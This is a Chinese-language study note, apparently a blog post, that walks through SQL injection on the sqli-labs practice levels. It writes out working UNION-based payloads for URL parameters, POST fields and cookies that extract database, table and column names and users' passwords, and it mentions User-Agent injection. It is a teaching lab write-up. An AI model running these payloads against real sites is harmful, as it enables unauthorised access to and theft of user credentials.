目录
明确参数类型
数字型
字符型
第一步:
第二步:
第三步:
?id=1' and 1=1--+
搜索型
JSON型(查资料得到)
明确请求方法:
GET和POST区别:(查资料得到)
GET请求和POST请求代码分析
在url/hackbar中用GET方法提交g
通过火狐插件 HackBar 在post提交p
POST 数据提交注入测试
第一步:
第二步:
第三步:
第一步:
第二步:
第三步:
第四步:
第五步:
第六步:
第七步:
Request
$_SERVER
明确参数类型
数字、字符、搜索、JSON等
数字型
不需要考虑用单引号等进行闭合
show databases;
use security;
show tables;
select * from users where id=1;
通过Dumb搜id的话就是字符型了,要加引号,不然会报错
字符型
字符串本身前后自带引号进行闭合
一般需要加引号闭合前面引号,后面的引号可通过加引号闭合,也可注释掉后面内容
第一步:
?id=1
显示正常说明为GET型字符类型
第二步:
?id=1'
加单号报错则说明符号为单引号
第三步:
?id=1' and 1=1--+
-------------->可以判断是字符型,符号为单引号
然后再进行猜字段,注入查询数据等操作
搜索型
和模糊查询一样的原理,对于输入的字符串-------->'%字符串%'
为了完成注入,要从字符型---->注入语句,就要过滤掉引号(')和百分号(%)
select * from users where username like '%Du%';
闭合前面的引号后,加入注入语句,再注释掉后面的
JSON型(查资料得到)
在 JSON 中,值必须是以下数据类型之一:
字符串、数字、对象(JSON 对象)、数组、布尔、Null
字符串必须用双引号包围:
{ "name":"John" }数字必须是整数或浮点数:
{ "age":30 }值可以是对象:
{"employee":{ "name":"Bill Gates", "age":62, "city":"Seattle" }}值可以是数组:
{"employees":[ "Bill", "Steve", "David" ]}值可以是ture/false:
{ "sale":true }值可以是null:
{ "middlename":null }
对于JSON这类参数类型
写入的注入语句常常遇见的干扰符号:’ , " ,% , ) , } 等
可能遇到到格式如下
用户={"name":" 'amiy' ","sex" :" 'girl' ",}
在postdata中输入:
json={"name"="liudehua' and 2=3 union select 1,database(),3--+"}
明确请求方法:
GET,POST请求方法
COOKIE,REQUEST,HTTP 头等
不同的请求方法,请求的数据类型或者大小不同,要考虑开发人员设定的特定的过滤机制
可以在浏览器带的开发人员工具里的网络处查看数据包信息(也可用burpsuite抓包)
GET和POST区别:(查资料得到)
(1) 在客户端,Get方式在通过URL提交数据,数据在URL中可以看到;POST方式,数据放置在HTML HEADER内提交。
(2) GET方式提交的数据最多只能有1024字节,而POST则没有此限制。
(3) 安全性问题。正如在(1)中提到,使用 Get 的时候,参数会显示在地址栏上,而 Post 不会。所以,如果这些数据是中文数据而且是非敏感数据,那么使用 get;如果用户输入的数据不是中文字符而且包含敏感数据,那么还是使用 post为好。
(4) 安全的和幂等的。所谓安全的意味着该操作用于获取信息而非修改信息。幂等的意味着对同一 URL 的多个请求应该返回同样的结果。完整的定义并不像看起来那样严格。换句话说,GET 请求一般不应产生副作用。从根本上讲,其目标是当用户打开一个链接时,她可以确信从自身的角度来看没有改变资源。比如,新闻站点的头版不断更新。虽然第二次请求会返回不同的一批新闻,该操作仍然被认为是安全的和幂等的,因为它总是返回当前的新闻。反之亦然。POST 请求就不那么轻松了。POST 表示可能改变服务器上的资源的请求。仍然以新闻站点为例,读者对文章的注解应该通过 POST 请求实现,因为在注解提交之后站点已经不同了。
GET请求和POST请求代码分析
<?php
@$g=$_GET['g'];
echo $g;
@$p=$_POST['post'];
echo $p;
?>
在url/hackbar中用GET方法提交g
(GET方法无法接收POST的值)
通过火狐插件 HackBar 在post提交p
安装hackbar,火狐2分钟解决(优选),及如何打开使用_黑色地带(崛起)的博客-CSDN博客
POST 数据提交注入测试
sqli-labs less11
第一步:
还是先找是不是有注入点
输入了一个单引号显示错误,说明可能存在注入点,符号可能为单引号
第二步:
点击post date输入
uname=admin' and 1=1#&passwd=admin&submit=Submit
(或者在第一个框输入admin' and 1=1# 第二个框输入admin 最后点击submit)
第三步:
执行其他读取修改数据等操作(常规操作了)
猜显示位数,获取数据库,获取表名,获取列名,获取数据
①uname=admin' and 1=2 union select 1,2 #&passwd=admin&submit=Submit
②uname=admin' and 1=2 union select database(),2 #&passwd=admin&submit=Submit
③uname=admin' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit
④uname=admin' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='users'#&passwd=admin&submit=Submit
⑤uname=admin' and 1=2 union select username,password from users #&passwd=admin&submit=Submit
cookie
(储存在用户本地终端上的数据)类型为"小型文本文件",是某些网站为了辨别用户身份,进行session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。(来自百度百科)
可以通过修改数据包中的cookie,进行注入
在浏览器自带的插件商店里下载一个cookie管理的插件 (我下载的是Cookie-Editor可以在开发模式下查看当前cookie和cookie quike manager能够修改cookie)
sqli-master less20
第一步:
在登录处输入自己账号密码,回显了我们的USER AGENT、IP地址、cookie信息
我输入的:admin admin
?
回显为cookie信息,这关注入点应该在cookie里,题目也提示为cookie注入
第二步:
(注意:每次修改cookie后,刷新sqli-labs的页面)
判断注入的相关类型
?
? 所以闭合方式为单引号,且为字符型注入
第三步:
(又回到常规的读取数据操作了)
猜显示字段数,
' order by 3--+
' order by 4--+
?
?
到4的时候报错,说明有3个显示字段
第四步:
查看当前库
' union select 1,database(),3 --+
?
第五步:
查看所有库
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ='security'--+
?
第六步:
查看指定表下所有列名
' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
?
第七步:
查看指定列名所有数据
' union select 1,2,group_concat(concat('-',id,username,password)) from users#
?
Request
HttpServletRequest对象是有关于客户端所发出的请求的对象,只要是有关于客户端请求的信息,都可以藉由它来取得,例如请求标头、请求方法、请求参数、客户端IP,客户端浏览器等等信息。(来自百度百科)
sqli-labs less-18
经过测试,发现对username,password都进行了过滤
以admin登录,网页显示了User Agent
可以利用构造User Agent进行注入
可以利用burp suite,firefox的插件TamperData等对User Agent进行注入
?
$_SERVER
是PHP里内置变量,全局变量
$_SERVER是预定义服务器变量的一种,所有$_SERVER开头的都是预定义服务变量。
有的服务项目可能会被忽略或屏蔽
(下列来之百度百科)
$_SERVER['PHP_SELF'] #当前正在执行脚本的文件名,与 document root相关。
$_SERVER['argv'] #传递给该脚本的参数。
$_SERVER['argc'] #包含传递给程序的命令行参数的个数(如果运行在命令行模式)。
$_SERVER['GATEWAY_INTERFACE'] #服务器使用的 CGI 规范的版本。例如,“CGI/1.1”。
$_SERVER['SERVER_NAME'] #当前运行脚本所在服务器主机的名称。
$_SERVER['SERVER_SOFTWARE'] #服务器标识的字串,在响应请求时的头部中给出。
$_SERVER['SERVER_PROTOCOL'] #请求页面时通信协议的名称和版本。例如,“HTTP/1.0”。
$_SERVER['REQUEST_METHOD'] #访问页面时的请求方法。例如:“GET”、“HEAD”,“POST”,“PUT”。
$_SERVER['QUERY_STRING'] #查询(query)的字符串。
$_SERVER['DOCUMENT_ROOT'] #当前运行脚本所在的文档根目录。在服务器配置文件中定义。
$_SERVER['HTTP_ACCEPT'] #当前请求的 Accept: 头部的内容。
$_SERVER['HTTP_ACCEPT_CHARSET'] #当前请求的 Accept-Charset: 头部的内容。例如:“iso-8859-1,*,utf-8”。
$_SERVER['HTTP_ACCEPT_ENCODING'] #当前请求的 Accept-Encoding: 头部的内容。例如:“gzip”。
$_SERVER['HTTP_ACCEPT_LANGUAGE']#当前请求的 Accept-Language: 头部的内容。例如:“en”。
$_SERVER['HTTP_CONNECTION'] #当前请求的 Connection: 头部的内容。例如:“Keep-Alive”。
$_SERVER['HTTP_HOST'] #当前请求的 Host: 头部的内容。
$_SERVER['HTTP_REFERER'] #链接到当前页面的前一页面的 URL 地址。
$_SERVER['HTTP_USER_AGENT'] #当前请求的 User-Agent: 头部的内容。
$_SERVER['HTTPS'] — 如果通过https访问,则被设为一个非空的值(on),否则返回off
$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。
$_SERVER['REMOTE_HOST'] #正在浏览当前页面用户的主机名。
$_SERVER['REMOTE_PORT'] #用户连接到服务器时所使用的端口。
$_SERVER['SCRIPT_FILENAME'] #当前执行脚本的绝对路径名。
$_SERVER['SERVER_ADMIN'] #管理员信息
$_SERVER['SERVER_PORT'] #服务器所使用的端口
$_SERVER['SERVER_SIGNATURE'] #包含服务器版本和虚拟主机名的字符串。
$_SERVER['PATH_TRANSLATED'] #当前脚本所在文件系统(不是文档根目录)的基本路径。
$_SERVER['SCRIPT_NAME'] #包含当前脚本的路径。这在页面需要指向自己时非常有用。
$_SERVER['REQUEST_URI'] #访问此页面所需的 URI。例如,“/index.html”。